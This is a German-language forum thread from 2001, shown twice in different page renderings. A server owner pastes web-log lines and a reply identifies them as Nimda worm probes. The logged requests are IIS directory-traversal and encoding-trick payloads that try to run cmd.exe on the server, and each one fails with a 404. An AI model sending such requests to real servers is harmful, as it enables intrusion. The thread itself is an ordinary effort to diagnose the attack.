webserver protokoll lesen???

erdling · 15.11.2001, 17:52

kann mir jemand sagen wer oder was da versucht meinen webserver zu überreden (wozu zu überreden) ???????????????????

virus, händischer versuch einzudringen, ganz normal?

62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2069 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2069 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:22 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:25 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""
62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" ""

danke ...

(-:fs)

MoSKiTo · 15.11.2001, 18:17

Schaut nach einem Besuch von Nimda aus. Ich habe solche Einträge auch tonnenweise in meinen Logs. Bei einem Linuxserver halt vergebene Liebesmüh

erdling · 15.11.2001, 18:29

dann offenbar auch bei einem ZOPE server vergebliche liebesmüh

(-:fs)

der_morpheus1 · 15.11.2001, 18:35

habe dir ein mail geschickt...
mfg.morph.

15.11.2001, 17:52	#1
erdling Senior Member Registriert seit: 30.10.2001 Beiträge: 107	webserver protokoll lesen??? kann mir jemand sagen wer oder was da versucht meinen webserver zu überreden (wozu zu überreden) ??????????????????? virus, händischer versuch einzudringen, ganz normal? 62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:13 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2069 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2065 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1956 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:19 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2069 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:21 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:22 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:25 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" 62.194.80.164: - - [06/Nov/2001:20:46:29 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2071 "" "" danke ... (-:fs)

15.11.2001, 18:17	#2
MoSKiTo Master Registriert seit: 20.11.2000 Beiträge: 592	Schaut nach einem Besuch von Nimda aus. Ich habe solche Einträge auch tonnenweise in meinen Logs. Bei einem Linuxserver halt vergebene Liebesmüh ____________________________________ standard nerd

15.11.2001, 18:35	#4
der_morpheus1 Elite Registriert seit: 11.02.2001 Beiträge: 1.181	habe dir ein mail geschickt... mfg.morph. ____________________________________ Manche Menschen Leben deswegen noch weil es Ilegal ist Sie zu Töten. Die Dummheit der Menschen und das Universum sind grenzenlos wobei ich mir beim Universum nicht sicher bin.

15.11.2001, 18:29	#3
erdling Senior Member Registriert seit: 30.10.2001 Beiträge: 107	dann offenbar auch bei einem ZOPE server vergebliche liebesmüh (-:fs)

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)